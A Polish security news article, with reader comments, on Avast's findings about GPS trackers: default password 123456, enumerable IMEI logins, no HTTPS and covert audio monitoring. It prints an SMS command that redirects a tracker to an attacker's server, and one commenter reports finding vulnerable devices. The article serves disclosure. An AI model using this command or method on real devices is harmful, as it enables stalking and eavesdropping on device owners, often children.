Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Używasz GPS trackera? Być może można Cię śledzić (w tym podsłuchiwać) korzystając z domyślnego hasła 123456…

06 września 2019, 11:00 | Aktualności | komentarzy 13

Niewielkie GPS trackery są często wykorzystywane do śledzenia lokalizacji dzieci, zwierząt czy przedmiotów. Takie urządzenia z jednej strony mają odbiornik sygnału GPS, z drugiej strony modem GSM (+ karta SIM), który umożliwia śledzenie lokalizacji w czasie rzeczywistym. Architektura takiego rozwiązania wygląda mniej więcej tak:

Tracker

Jak widać producenci trackerów często udostępniają appki i/lub panel webowy np.: http://en.i365gps.com. Jak widać urządzenia są też chyba popularne w Polsce:

Przechodząc do sedna – badacze Avasta przeanalizowali grupę GPS trackerów i przedstawili swoje wnioski. Po pierwsze na ww. stronie można było z marszu zalogować się do 25% urządzeń (domyślne hasło 123456, i przewidywalny username, będący liczbą):

(…)  the numbers of all other trackers are predictable and you can easily enumerate them. In combination with a fixed password, that means we could log into about 25%  of devices in this sequence of IMEI numbers.

W sumie badacze wykryli około 600 000 urządzeń z domyślnym hasłem 123456. Dalej jest tylko lepiej. Brak HTTPS przy komunikacji trackera z serwerem (lub wyżej opisane przechwycenie konta; w obu przypadkach mamy dostęp do konta ofiary) umożliwia nasłuch głosu z trackera:

You can make the tracker call an arbitrary phone number and once connected, you can listen through the tracker the other party without their knowledge.

Jak można z kolei przejąć tego typu urządzenie zwykłym SMS-em? Wystarczy wysłać coś takiego na numer karty SIM trackera:

SMS

pw,123456,ip,nasz_adres_ip,y# Co robi tracker? Zmieni konfigurację tak żeby łączyć się do naszego serwera (a nie serwera producenta). Voila.

Na koniec – tego typu trackery popularne są niemal na całym świecie, a często różni producenci używają tej samej infrastruktury serwerowej…

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. A

    Poleci ktoś sprzęt z którego można zrobić sensowny tracker? Z własnym softem np w pythonie. Kiedyś były takie trackery na bazie modułów telita ale to starocie, powolne, mało pamięci, nie obsługują 3g itd.

    Odpowiedz
    • Ł

      Zależy do czego. Jeśli nie musi być miniaturowy to najlepiej arduino

      Odpowiedz
      • A

        To wyszła by ogromna krowa gabarytowo. Moduły ładowania li-ion, pomiaru napięcia zasilania, prądu ładowania, poboru prądu przez antenę gps, modem komunikacji 3g, akcelerometr itd.

        Chodzi o hw gotowe, przemyślane, a tylko z możliwością wrzucenia własnego oprogramowania.

        Odpowiedz
  2. Paweł

    Mam taki chiński tracker (st-901) i problem wynika też z mnogości podrób (tak, Chińczycy podrabiają chińskie produkty). I tak np. ST-901 można kupić a dostać GT09 albo cokolwiek innego. Polecam temat na elektrodzie: „GT02-Sinotrack ST901 – Mini tracker GPS nie zmienia strefy czasowej”. Ogólnie nie polecam takich rozwiązań komukolwiek kto chce „zabezpieczyć” cokolwiek, bo możliwe że tego typu rozwiązanie jeszcze ułatwi złodziejom namierzenie potencjalnego łupu.

    Odpowiedz
    • zero one

      Dobrze Panie @Pawle że Pan o tym wspomina.
      Pozdrawiam.

      Odpowiedz
  3. ja

    Taki GPS GF-07 nie działa u nas w wcale.
    Po zakupie i googlaniu okazało się że pozycje określa na podstawie sieci GSM w sposób nie obsługiwany w europie.
    Może służyć jedynie jako podsłuch. Odbiera połączenie od każdego numeru bez żadnej autoryzacji.

    Odpowiedz
  4. Witek

    O tyle bezpieczniej, że dopóki nie zostanie wpisany numer telefonu w panelu www ani aplikacji nie jest widoczny.

    Odpowiedz
  5. Xergon

    Nie chce nic mówic ale po chwili znalazlem 2 numery z domyślnym hasłem ;/ żenada.

    Odpowiedz
  6. zero one

    Boże na nieboskłonie!
    „123456”? Serio? Przecież to tragikomedia jakaś. ;-D

    Odpowiedz
  7. traccar

    Serwer można sobie postawić samemu (traccar – za darmo, działa w Dockerze, itd…), hasło trzeba oczywiście zmienić w module SMSem i ustawić niestandardowy port. Jest opis jak zrobic HTTPS, ale mi się nie chciało ;-) Jak kogoś interesuje gdzie jest mój rower… cóż. Podsłuch? Moduł jest pod siodełkiem :-D

    Odpowiedz
  8. Michał

    Wielka rewelacja.
    Te informacje są powszechnie dostępne w Internecie od ponad 2 lat
    (moje dziecko dostało taki zegarek na prezent). Polecam FAQ na stronie dystrybutora Garett.

    Odpowiedz
  9. markac

    Jak Tracker nie ma autoryzacji numeru, z którego można wysyłać komendy, to można wszystko…
    Podsłuchać rozmowy, zmienić konfigurację, o lokalizacji już nie wspomnę, bo to najmniejsze zmartwienie.
    Tak tworzą duże firmy, a na pytanie, czemu tego nie zabezpieczą, odpowiedz: Bo byłoby to za trudne w obsłudze.
    Tak, wprowadzenie do każdej komendy hasła, czy dodanie numeru do białej listy jest dla nich „utrudnieniem” dla użytkownika.
    Niestety samemu ciężko taki Tracker zrobić, zaprojektowanie układu na jakimś MediaTeku to nie jest hop siup, a na Androidzie i modułach GSM/GPS to wyjdzie krowa.

    Odpowiedz
    • markac

      Miało być na Arduino, nie na Androidzie.

      Odpowiedz

Odpowiedz